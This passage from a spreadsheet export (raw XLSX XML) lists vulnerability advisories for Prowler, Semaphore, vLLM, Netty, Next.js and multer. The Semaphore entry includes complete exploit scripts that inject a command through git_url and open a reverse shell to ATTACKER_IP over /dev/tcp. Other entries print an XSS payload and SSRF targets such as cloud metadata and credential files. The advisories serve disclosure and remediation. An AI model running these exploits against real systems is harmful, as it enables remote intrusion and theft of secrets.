A proof HTML fragment using the same formatter structure set `window.PROWLER_TAG_XSS=1` from `resource_tags`, while equivalent payloads in `resource_uid` and `status_extended` stayed text because those fields are escaped.

Local evidence:

- `/home/unkn0wn/security_audit/vulnerability-reports/prowler-html-tag-xss-evidence-2026-05-26.json`
- `/home/unkn0wn/security_audit/vulnerability-reports/prowler-html-tag-xss-proof-full.html`

## PoC

The minimized generated row below mirrors the vulnerable formatter output. The first and third candidate payloads are escaped controls. The middle payload is the unescaped `resource_tags` value and executes when the report is rendered.

```html
&lt;tr class="table-danger"&gt;
  &lt;td&gt;&amp;lt;img src=x onerror="window.PROWLER_UID_XSS=1"&amp;gt;&lt;/td&gt;
  &lt;td&gt;
    &amp;#x2022;Owner=&lt;img src=x onerror="window.PROWLER_TAG_XSS=1;document.body.setAttribute('data-prowler-tag-xss','1')"&gt;
  &lt;/td&gt;
  &lt;td&gt;&amp;lt;img src=x onerror="window.PROWLER_STATUS_XSS=1"&amp;gt;&lt;/td&gt;
&lt;/tr&gt;
```

Browser proof result from the local artifact:

```json
{"tag": 1, "uid": 0, "status": 0, "attr": "1"}
```

## Remediation

Escape tag keys and values before inserting them into HTML output. Prefer a single HTML escaping helper for every finding field that can originate from provider data. If bullets or separators are needed, build the list structure after escaping each key and value, rather than escaping the final HTML string after markup has been added.</t></is></c><c r="T1589" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73262</t></is></c></row><row r="1590"><c r="A1590" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1590" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1590" s="5" t="inlineStr"><is><t>CVE-2026-73294</t></is></c><c r="D1590" s="5" t="inlineStr" /><c r="E1590" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F1590" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1590" s="5" t="inlineStr" /><c r="H1590" s="5" t="n"><v>0.006</v></c><c r="I1590" s="5" t="inlineStr" /><c r="J1590" s="5" t="inlineStr" /><c r="K1590" s="5" t="inlineStr" /><c r="L1590" s="5" t="inlineStr"><is><t>Go:github.com/semaphoreui/semaphore</t></is></c><c r="M1590" s="5" t="inlineStr"><is><t>0.0.0-20260704181911-7e8a9434bd81</t></is></c><c r="N1590" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1590" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1590" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1590" s="5" t="inlineStr" /><c r="R1590" s="5" t="inlineStr" /><c r="S1590" s="5" t="inlineStr"><is><t># Summary
An OS command injection in repository git_url handling lets any user holding the Manager or Owner role on any project (the normal project-collaborator roles) achieve remote code execution on the Semaphore server host. Using git's --upload-pack=&lt;cmd&gt; option, an attacker runs arbitrary commands. The command executes inside the main Semaphore server process (via the schedule commit-hash poller), so it runs even when jobs are configured for remote runners — bypassing runner isolation and exposing the master encryption key and every project's secrets. Reproducible on a default install (git_client: cmd_git); no non-default configuration is required.

# Details
The repository git_url is attacker-controlled (HTTP body) and reaches exec.Command("git", ...) unvalidated. Two missing controls cause this:

1. git_url is never validated against option injection.
Repository.Validate() (db/Repository.go, ~lines 138–156) validates the branch via ValidateGitBranch (db/git_branch.go, which rejects a leading -), but performs no equivalent check on GitURL (only "non-empty"). ValidateRepository (db/Store.go, ~802–806) only checks the SSH key. CreateRepository (db/sql/repository.go, ~76–95) stores it verbatim. Because --upload-pack=... has no scheme:// and no leading /, GetType() (db/Repository.go, ~113–136) classifies it as RepositorySSH and GetGitURL(false) (~72–111) returns it raw/unchanged.

2. The git command is built with no -- separator.
CmdGitClient.GetLastRemoteCommitHash (db_lib/CmdGitClient.go, ~169–185) calls:
c.output(r, GitRepositoryTmpPath, "ls-remote",
           r.Repository.GetGitURL(false),   // attacker-controlled
           r.Repository.GitBranch)          // "master"
output (~79–93) → makeCmd (~21–60): exec.Command("git") (line ~27), cmd.Args = append(cmd.Args, args...) (line ~55). The resulting argv has no --:
["git", "ls-remote", "--upload-pack=&lt;cmd&gt;;true", "master"]
git parses --upload-pack=... as an option; master becomes the (local-transport) repository operand; git then executes the upload-pack value through a shell (sh -c "&lt;cmd&gt; 'master'"), running &lt;cmd&gt;. This is intended git behavior — the fault is Semaphore passing untrusted data as argv. (The command runs even though git subsequently prints fatal: Could not read from remote repository and exits 128, and even though master is not a real path.)

### Trigger — it fires in the server process.
A project schedule with a repository_id causes the scheduler to run git ls-remote to check for new commits. AddSchedule (api/projects/schedules.go, ~130–160; validateSchedulePayload ~86–118 validates only the cron format — it does not require the repo to be tied to the template). The schedule pool is started in the server process: runService in cli/cmd/root.go (CreateSchedulePool ~line 115, go schedulePool.Run() ~line 193), independent of remote-runner config. On each tick, ScheduleRunner.Run (services/schedules/SchedulePool.go, ~96–193, line ~117) calls tryUpdateScheduleCommitHash (~61–94) — before the HA de-dup lock (~145) — which loads the repo by repository_id and calls GetLastRemoteCommitHash(). Refresh (~265–358, line 287) registers such schedules even when inactive, so deactivating does not stop it.

### Entry points:
POST /api/project/{id}/repositories (api/projects/repository.go:AddRepository, ~101–137) stores the payload; POST /api/project/{id}/schedules arms it. Both are gated by GetMustCanMiddleware(db.CanManageProjectResources) (api/router.go ~294/310/327), a permission held by ProjectManager/ProjectOwner (db/ProjectUser.go, ~22–27).

# PoC
Environment: the official semaphore v2.18.12 binary; git, python3, nc present. This PoC uses the default git client and non_admin_can_create_project: false; the attacker lowpriv is onboarded by the admin as a normal Manager (no special configuration).

### Terminal 1 — config + users + server
```
  cd ~/PoC &amp;&amp; mkdir -p tmp
  cat &gt; config.json &lt;&lt;EOF
  { "sqlite":{"host":"$PWD/database.sqlite"},"dialect":"sqlite","tmp_path":"$PWD/tmp",
    "port":":3000","interface":"127.0.0.1",
    "cookie_hash":"$(head -c32 /dev/urandom|base64)","cookie_encryption":"$(head -c32 /dev/urandom|base64)",
    "access_key_encryption":"$(head -c32 /dev/urandom|base64)","git_client":"cmd_git",
    "non_admin_can_create_project":false,"web_host":"http://127.0.0.1:3000/" }
  EOF
  ./semaphore user add --admin --login admin  --name Admin --email admin@example.com --password 'Admin123!'  --config config.json
  ./semaphore user add        --login lowpriv --name Low   --email low@example.com   --password 'LowPriv123!' --config config.json
  ./semaphore server --config config.json
```
### Terminal 2 — attacker listener
```
  nc -lvnp 4444
```
### Terminal 3 — admin onboards lowpriv as Manager, then lowpriv exploits
```
  cd ~/PoC

  cat &gt; onboard.sh &lt;&lt;'EOF'
  #!/usr/bin/env bash
  set -euo pipefail
  BASE="${BASE:-http://127.0.0.1:3000}"
  ADMIN="${ADMIN:-admin}"; ADMIN_PASS="${ADMIN_PASS:-Admin123!}"; MEMBER="${MEMBER:-lowpriv}"
  JAR=$(mktemp)
  curl -s -c "$JAR" -X POST "$BASE/api/auth/login" -H 'Content-Type: application/json' \
    -d "{\"auth\":\"$ADMIN\",\"password\":\"$ADMIN_PASS\"}" &gt;/dev/null
  PROJ_PID=$(curl -s -b "$JAR" -X POST "$BASE/api/projects" -H 'Content-Type: application/json' \
    -d '{"name":"team-project","alert":false}' | python3 -c 'import sys,json;print(json.load(sys.stdin)["id"])')
  USER_ID=$(curl -s -b "$JAR" "$BASE/api/users" | \
    python3 -c "import sys,json;print(next(u['id'] for u in json.load(sys.stdin) if u['username']=='$MEMBER'))")
  curl -s -b "$JAR" -X POST "$BASE/api/project/$PROJ_PID/users" -H 'Content-Type: application/json' \
    -d "{\"user_id\":$USER_ID,\"role\":\"manager\"}" -o /dev/null
  rm -f "$JAR"; echo "[*] $MEMBER is Manager of project $PROJ_PID" &gt;&amp;2; echo "$PROJ_PID"
  EOF
  chmod +x onboard.sh

  cat &gt; rce.sh &lt;&lt;'EOF'
  #!/usr/bin/env bash
  set -euo pipefail
  BASE="${BASE:-http://127.0.0.1:3000}"; LOGIN="${LOGIN:-lowpriv}"; PASS="${PASS:-LowPriv123!}"
  PROJ_PID="${PROJ_PID:?set PROJ_PID from onboard.sh}"
  CMD="$*"; B64=$(printf '%s' "$CMD" | base64 -w0)
  GITURL="--upload-pack=bash -c \"echo $B64 | base64 -d | bash\";true"
  JAR=$(mktemp); jid(){ python3 -c 'import sys,json;print(json.load(sys.stdin)["id"])'; }
  post(){ curl -s -b "$JAR" -X POST "$BASE$1" -H 'Content-Type: application/json' -d "$2"; }
  curl -s -c "$JAR" -X POST "$BASE/api/auth/login" -H 'Content-Type: application/json' \
    -d "{\"auth\":\"$LOGIN\",\"password\":\"$PASS\"}" &gt;/dev/null
  KID=$(post /api/project/$PROJ_PID/keys "{\"name\":\"k\",\"type\":\"none\",\"project_id\":$PROJ_PID}" | jid)
  BODY=$(python3 -c "import json,sys;print(json.dumps({'name':'r','project_id':$PROJ_PID,'git_url':sys.argv[1],'git_branch':'master','ssh_key_id':$KID}))" "$GITURL")
  RID=$(post /api/project/$PROJ_PID/repositories "$BODY" | jid)
  TID=$(post /api/project/$PROJ_PID/templates "{\"name\":\"t\",\"project_id\":$PROJ_PID,\"app\":\"bash\",\"playbook\":\"n.sh\",\"repository_id\":$RID,\"type\":\"\"}" | jid)
  post /api/project/$PROJ_PID/schedules "{\"name\":\"s\",\"project_id\":$PROJ_PID,\"template_id\":$TID,\"repository_id\":$RID,\"cron_format\":\"* * * * *\"}" &gt;/dev/null
  rm -f "$JAR"; echo "[*] queued as lowpriv (Manager of $PROJ_PID): $CMD"
  EOF
  chmod +x rce.sh

  PROJ_PID=$(./onboard.sh)
  ATTACKER_IP=127.0.0.1
  PROJ_PID=$PROJ_PID ./rce.sh "bash -i &gt;&amp; /dev/tcp/$ATTACKER_IP/4444 0&gt;&amp;1"
```

Within ~60 s the schedule fires and the Semaphore server process connects back to the listener (Terminal 2), giving an interactive shell as the server user. Verify with id and cat ~/PoC/config.json (the server can read its own access_key_encryption master key).

# Impact
- Type: OS command injection via argument injection — remote code execution.
- Who is impacted: any Semaphore deployment running the default git_client: cmd_git. The attacker only needs an authenticated account holding the Manager or Owner role on any project — the standard collaborator roles. (If non_admin_can_create_project is enabled, literally any authenticated user qualifies, since they can self-create a project and become its Owner. Global admins always qualify.)</t></is></c><c r="T1590" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73294</t></is></c></row><row r="1591"><c r="A1591" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1591" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1591" s="5" t="inlineStr"><is><t>CVE-2026-73558</t></is></c><c r="D1591" s="5" t="inlineStr" /><c r="E1591" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1591" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1591" s="5" t="inlineStr" /><c r="H1591" s="5" t="n"><v>0.003</v></c><c r="I1591" s="5" t="inlineStr" /><c r="J1591" s="5" t="inlineStr" /><c r="K1591" s="5" t="inlineStr" /><c r="L1591" s="5" t="inlineStr"><is><t>PyPI:vllm</t></is></c><c r="M1591" s="5" t="inlineStr"><is><t>0.27.0</t></is></c><c r="N1591" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1591" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1591" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1591" s="5" t="inlineStr" /><c r="R1591" s="5" t="inlineStr" /><c r="S1591" s="5" t="inlineStr"><is><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trigger.
### PoC
We reproduced the issue using meta-llama/Llama-3.2-1B-Instruct, for which d = 8192.

Using the following configuration:

Batch size: 17
Sequence length: 16384

The final response in the batch becomes an exact copy of the first response in the batch, demonstrating complete cross-user data leakage.

### Impact
This vulnerability enables cross-user information disclosure. An attacker can intentionally craft requests that are processed within the same inference batch as a victim's request and cause the victim's inference output to be copied into the attacker's response.

As a result, sensitive information contained in another user's model response may be exposed to an unauthorized party.

### Versions

For versions prior and equal to 0.21.0, the bug is in csrc/activation_kernels.cu, and for versions later than 0.21.0, the bug is in csrc/libtorch_stable/activation_kernels.cu.</t></is></c><c r="T1591" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73558</t></is></c></row><row r="1592"><c r="A1592" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1592" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1592" s="5" t="inlineStr"><is><t>CVE-2026-73560</t></is></c><c r="D1592" s="5" t="inlineStr" /><c r="E1592" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1592" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1592" s="5" t="inlineStr" /><c r="H1592" s="5" t="n"><v>0.003</v></c><c r="I1592" s="5" t="inlineStr" /><c r="J1592" s="5" t="inlineStr" /><c r="K1592" s="5" t="inlineStr" /><c r="L1592" s="5" t="inlineStr"><is><t>PyPI:vllm</t></is></c><c r="M1592" s="5" t="inlineStr"><is><t>0.26.0</t></is></c><c r="N1592" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1592" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1592" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1592" s="5" t="inlineStr" /><c r="R1592" s="5" t="inlineStr" /><c r="S1592" s="5" t="inlineStr"><is><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lines 231–249):**

```python
def _fetch_image(src: Any) -&gt; Image.Image:
    if isinstance(src, Image.Image):
        return _to_rgb(src)
    if isinstance(src, bytes):
        return _to_rgb(copy.deepcopy(Image.open(BytesIO(src))))
    if isinstance(src, str):
        if src.startswith(("http://", "https://")):
            r = requests.get(src, timeout=30)              # SSRF: no allowlist, follows redirects
            r.raise_for_status()
            return _to_rgb(copy.deepcopy(Image.open(BytesIO(r.content))))
        if src.startswith("file://"):
            return _to_rgb(Image.open(src[7:]))            # arbitrary local file read
        if src.startswith("data:image"):
            ...
        return _to_rgb(Image.open(src))                    # fallback also opens local files
    raise ValueError(f"Unrecognized image source: {type(src)}")
```

**Sink 2 — audio SSRF (around line 471):**

```python
elif audio.startswith(("http://", "https://")):
    r = requests.get(audio, timeout=30)                    # SSRF: same pattern
    r.raise_for_status()
    file_obj = io.BytesIO(r.content)
```

**Reachability.** `_fetch_image` is invoked from `MiMoVLProcessor.process_image`:

```python
def process_image(self, image: ImageInput) -&gt; torch.Tensor:
    kw = self._resolve_img_kw(image)
    src = image.image
    if isinstance(src, (str, bytes)):
        src = _fetch_image(src)
    ...
```

`MiMoVLProcessor` is wrapped by `MiMoV2OmniMultiModalProcessor` and registered for the `MiMoV2OmniForCausalLM` model architecture (`vllm/model_executor/models/mimo_v2_omni.py:1169`). Whenever a user passes a string into `multi_modal_data["image"]` (or `["audio"]`) for this model, the unsanitized URL/path reaches the sink.

**Comparison to the recent fixes.** The remediation pattern adopted in the three earlier advisories was to route every external resource fetch through `MediaConnector`, which checks `allowed_local_media_path` and applies SSRF protection before issuing the network request. `chat_utils.py` (lines 838, 902, 924, 963, 1053, 1081) already uses `self._connector.fetch_image / fetch_audio / fetch_video`. The model processor in `mimo_v2_omni.py` was added later and skipped the connector — it calls `requests.get` and `Image.open` directly. Result: the public OpenAI chat-completion path is protected, but library use (`LLM.generate(multi_modal_data=...)`), batch processing, and any other path that lets a string reach the processor receive no protection.

### Impact

1. **SSRF — internal-network probing / cloud-metadata theft.** Standard `requests.get` follows redirects and accepts any URL. An attacker who controls a `multi_modal_data` value can:
   - read AWS / GCP / Azure instance metadata (e.g. `http://169.254.169.254/latest/meta-data/iam/security-credentials/`),
   - probe internal services on the vLLM host (`http://127.0.0.1:&lt;port&gt;`, `http://10.x.y.z`),
   - exfiltrate via DNS / HTTP timing oracles even when the body is rejected by `Image.open`.
2. **Arbitrary local file read** via `file://path` (line 242) and the unguarded fallback `Image.open(src)` (line 248). Any file readable by the vLLM process is reachable through the model pipeline; with suitable formats this exposes `/etc/passwd`, `~/.aws/credentials`, etc.
3. **Server-side traffic generation / amplification** by hammering arbitrary URLs from the vLLM host, with a 30-second timeout per request.

### Suggested remediation

Replace direct `requests.get` and bare `Image.open` paths with `MediaConnector.fetch_image` / `fetch_audio_async` (or pass the inputs through `MediaConnector` before they reach the processor):

```python
# vllm/transformers_utils/processors/mimo_v2_omni.py
from vllm.multimodal.utils import MediaConnector

_connector = MediaConnector()

def _fetch_image(src):
    if isinstance(src, Image.Image):
        return _to_rgb(src)
    if isinstance(src, bytes):
        return _to_rgb(copy.deepcopy(Image.open(BytesIO(src))))
    if isinstance(src, str):
        return _to_rgb(_connector.fetch_image(src))   # delegates to the hardened path
    raise ValueError(f"Unrecognized image source: {type(src)}")
```

Same change for the audio loader at line 471. This re-uses the SSRF allowlist, `allowed_local_media_path` policy, and size caps that the previous patches added.

Alternative: forbid `str` `src` from reaching the processor and require all multi-modal pre-processing to go through `chat_utils.py` / `MediaConnector` before hitting the model. Larger surface change, but completes the architectural fix.

### Discovery

Static review on `vllm@main` (HEAD as of 2026-04-30) — found by triaging the file list against the three recent SSRF advisories: the `mimo_v2_omni.py` processor, added after those fixes, reintroduced the same bypass class.

### Reporter

Ievgen Bondarenko — `sactransport2000@gmail.com` — GitHub `@ibondarenko1`</t></is></c><c r="T1592" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73560</t></is></c></row><row r="1593"><c r="A1593" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1593" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1593" s="5" t="inlineStr"><is><t>CVE-2026-75595</t></is></c><c r="D1593" s="5" t="inlineStr" /><c r="E1593" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F1593" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1593" s="5" t="inlineStr" /><c r="H1593" s="5" t="n"><v>0.003</v></c><c r="I1593" s="5" t="inlineStr" /><c r="J1593" s="5" t="inlineStr" /><c r="K1593" s="5" t="inlineStr" /><c r="L1593" s="5" t="inlineStr"><is><t>Maven:io.netty:netty-handler</t></is></c><c r="M1593" s="5" t="inlineStr"><is><t>4.1.137.Final, 4.2.17.Final</t></is></c><c r="N1593" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1593" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1593" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1593" s="5" t="inlineStr" /><c r="R1593" s="5" t="inlineStr" /><c r="S1593" s="5" t="inlineStr"><is><t>### Summary
A fragmented TLS ClientHello whose handshake header spans multiple records makes Netty silently fall back to the default SslContext; where per-SNI selection is the sole mTLS gate, an unauthenticated attacker can bypass the route's mTLS requirement.

### Details
In `io.netty.handler.ssl.SslClientHelloHandler#decode` the guard that should wait for the 4-byte handshake header checks the wrong offset - it ignores the 5-byte record header that precedes it - and therefore never fires:

```java
if (handshakeLength == -1) {
    if (readerIndex + 4 &gt; endOffset) {
        // Need more data to read HandshakeType and handshakeLength (4 bytes)
        return;
    }
```

When the first record's payload is &lt; 4 bytes, `handshakeLength = in.getUnsignedMedium(readerIndex + SslUtils.SSL_RECORD_HEADER_LENGTH + 1);` leads to `IndexOutOfBoundsException `. That is caught by the generic `catch (Exception)` block, which calls `select(ctx, null)` - this is the default `SslContext`. Fallback to default on parse failure is a problem when per-SNI selection is the sole mTLS gate.

### Impact
SNI routing bypass. Escalates to an unauthenticated mTLS bypass only when:
- mTLS is enforced solely via per-SNI SslContext (clientAuth=REQUIRE)
- the default/fallback SslContext is permissive (clientAuth=NONE/OPTIONAL)
- no secondary peer-certificate verification exists at the application layer.</t></is></c><c r="T1593" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75595</t></is></c></row><row r="1594"><c r="A1594" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1594" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1594" s="5" t="inlineStr"><is><t>CVE-2026-75596</t></is></c><c r="D1594" s="5" t="inlineStr" /><c r="E1594" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1594" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1594" s="5" t="inlineStr" /><c r="H1594" s="5" t="n"><v>0.004</v></c><c r="I1594" s="5" t="inlineStr" /><c r="J1594" s="5" t="inlineStr" /><c r="K1594" s="5" t="inlineStr" /><c r="L1594" s="5" t="inlineStr"><is><t>Maven:io.netty:netty-handler</t></is></c><c r="M1594" s="5" t="inlineStr"><is><t>4.1.137.Final, 4.2.17.Final</t></is></c><c r="N1594" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1594" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1594" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1594" s="5" t="inlineStr" /><c r="R1594" s="5" t="inlineStr" /><c r="S1594" s="5" t="inlineStr"><is><t>### Summary

Netty's default SNI entrypoint reparses and recopies previously received ClientHello fragments on every additional TLS handshake record. A remote peer can send a small first record that advertises a large ClientHello length and then drip the body in many tiny records, causing **superlinear (quadratic) CPU work** before the handshake completes. With 4095 one-byte fragments, the handler recopies **8,386,560 bytes** from only **24,579 bytes** on the wire — a **341× amplification** ratio.

### Affected Entrypoints

- `io.netty.handler.ssl.SniHandler` — default constructors
- `io.netty.handler.ssl.SslClientHelloHandler` — pre-handshake ClientHello aggregation path

### Vulnerable Code Locations

- `handler/src/main/java/io/netty/handler/ssl/SniHandler.java:85`
- `handler/src/main/java/io/netty/handler/ssl/SslClientHelloHandler.java:75` (decode entry)
- `handler/src/main/java/io/netty/handler/ssl/SslClientHelloHandler.java:165` (handshakeBuffer.clear)
- `handler/src/main/java/io/netty/handler/ssl/SslClientHelloHandler.java:174` (writeBytes re-copy)
- `codec-base/src/main/java/io/netty/handler/codec/ByteToMessageDecoder.java:294` (cumulation retention)

### Exploit Path

```
1. TCP connection → SniHandler → SslClientHelloHandler.decode
2. First record: TLS handshake header declaring large ClientHello length (e.g., 4096 bytes)
3. Attacker sends thousands of tiny follow-on handshake records (1 byte each)
4. On each fragment: handshakeBuffer.clear() + writeBytes() re-copies ALL accumulated body bytes
5. Total bytes copied = n*(n+1)/2 where n = number of body bytes → quadratic
6. Event-loop CPU exhausted before SslHandler takes over
```

### Impact

- **Vulnerability Type:** Inefficient Algorithmic Complexity
- An unauthenticated network attacker can drive disproportionate CPU consumption on the Netty event loop
- Affects **all** Netty deployments using `SniHandler` for TLS termination (the default SNI path)
- No privileges, user interaction, or special configuration required
- Can degrade or stall TLS connection handling for all clients on the affected event loop
- The attack requires only modest bandwidth (~25 KB) to trigger significant CPU work

---
### Credits

Found by a security research team from the University of Sydney, focusing on detecting open source software vulnerabilities.
Liyi Zhou: https://lzhou1110.github.io/
Ziyue Wang: https://zyy0530.github.io/
Strick: https://str1ckl4nd.github.io/
Maurice: https://maurice.busystar.org/
Chenchen Yu: https://7thparkk.github.io/</t></is></c><c r="T1594" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75596</t></is></c></row><row r="1595"><c r="A1595" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1595" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1595" s="5" t="inlineStr"><is><t>CVE-2026-75604</t></is></c><c r="D1595" s="5" t="inlineStr" /><c r="E1595" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F1595" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1595" s="5" t="inlineStr" /><c r="H1595" s="5" t="n"><v>0.025</v></c><c r="I1595" s="5" t="inlineStr" /><c r="J1595" s="5" t="inlineStr" /><c r="K1595" s="5" t="inlineStr" /><c r="L1595" s="5" t="inlineStr"><is><t>npm:next</t></is></c><c r="M1595" s="5" t="inlineStr"><is><t>15.5.24, 16.3.3</t></is></c><c r="N1595" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1595" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1595" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1595" s="5" t="inlineStr" /><c r="R1595" s="5" t="inlineStr" /><c r="S1595" s="5" t="inlineStr"><is><t>## Impact

A vulnerability in applications using Pages and App router without Cache Component can lead to remote code execution when the server is hosted on machines using a Windows filesystem.

## Workaround

There is no known workaround for affected windows-hosted applications. You should upgrade immediately if your server is hosted on Windows.</t></is></c><c r="T1595" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75604</t></is></c></row><row r="1596"><c r="A1596" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1596" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1596" s="5" t="inlineStr"><is><t>CVE-2026-77037</t></is></c><c r="D1596" s="5" t="inlineStr" /><c r="E1596" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1596" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1596" s="5" t="inlineStr" /><c r="H1596" s="5" t="n"><v>0.003</v></c><c r="I1596" s="5" t="inlineStr" /><c r="J1596" s="5" t="inlineStr" /><c r="K1596" s="5" t="inlineStr" /><c r="L1596" s="5" t="inlineStr"><is><t>npm:multer</t></is></c><c r="M1596" s="5" t="inlineStr"><is><t>2.3.0</t></is></c><c r="N1596" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1596" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1596" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1596" s="5" t="inlineStr" /><c r="R1596" s="5" t="inlineStr" /><c r="S1596" s="5" t="inlineStr"><is><t>### Impact

A vulnerability in multer `2.2.0` allows an attacker to trigger a Denial of Service (DoS) by aborting or truncating multipart uploads. When using `diskStorage`, the destination write stream is not closed if the upload is aborted before it finishes, so each failed request leaks an open file descriptor and retains its disk blocks until the process exits. Repeated failed uploads can exhaust the available file descriptors. All applications using multer's disk storage are affected.

### Patches

Users should upgrade to `2.3.0`.

### Workarounds

None.</t></is></c><c r="T1596" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77037</t></is></c></row><row r="1597"><c r="A1597" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1597" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1597" s="5" t="inlineStr"><is><t>CVE-2026-77063</t></is></c><c r="D1597" s="5" t="inlineStr" /><c r="E1597" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F1597" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1597" s="5" t="inlineStr" /><c r="H1597" s="5" t="n"><v>0.002</v></c><c r="I1597" s="5" t="inlineStr" /><c r="J1597" s="5" t="inlineStr" /><c r="K1597" s="5" t="inlineStr" /><c r="L1597" s="5" t="inlineStr"><is><t>npm:multer</t></is></c><c r="M1597" s="5" t="inlineStr"><is><t>2.3.0</t></is></c><c r="N1597" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1597" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1597" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1597" s="5" t="inlineStr" /><c r="R1597" s="5" t="inlineStr" /><c r="S1597" s="5" t="inlineStr"><is><t>### Impact

When `multer` is configured with an asynchronous `fileFilter`, the `limits.fileSize` limit can be bypassed. The `'limit'` event is registered inside the async `fileFilter` callback, so if a file exceeds `limits.fileSize` before that callback runs, the event is missed and the oversized upload is accepted instead of being rejected with a `LIMIT_FILE_SIZE` error. Applications that rely on `limits.fileSize` to reject oversized uploads are affected on all upload methods (`.single()`, `.array()`, `.fields()`, `.any()`). Uploads using a synchronous `fileFilter` are not affected.

### Patches

Users should upgrade to `2.3.0`.

### Workarounds

Use a synchronous `fileFilter`, or validate the uploaded file size after the upload completes.</t></is></c><c r="T1597" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77063</t></is></c></row><row r="1598"><c r="A1598" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1598" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1598" s="5" t="inlineStr"><is><t>CVE-2026-77078</t></is></c><c r="D1598" s="5" t="inlineStr" /><c r="E1598" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1598" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1598" s="5" t="inlineStr" /><c r="H1598" s="5" t="n"><v>0.003</v></c><c r="I1598" s="5" t="inlineStr" /><c r="J1598" s="5" t="inlineStr" /><c r="K1598" s="5" t="inlineStr" /><c r="L1598" s="5" t="inlineStr"><is><t>npm:multer</t></is></c><c r="M1598" s="5" t="inlineStr"><is><t>2.3.0</t></is></c><c r="N1598" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1598" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1598" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1598" s="5" t="inlineStr" /><c r="R1598" s="5" t="inlineStr" /><c r="S1598" s="5" t="inlineStr"><is><t>### Impact

A vulnerability in multer allows a remote, unauthenticated attacker to crash the Node.js process with a single `multipart/form-data` request. Two specially crafted text field names cause an uncaught `RangeError: Invalid array length` inside multer's field parsing, which is not routed to the application error handler and terminates the process. All applications using multer to parse multipart requests are affected.

### Patches

Users should upgrade to `2.3.0`.

### Workarounds

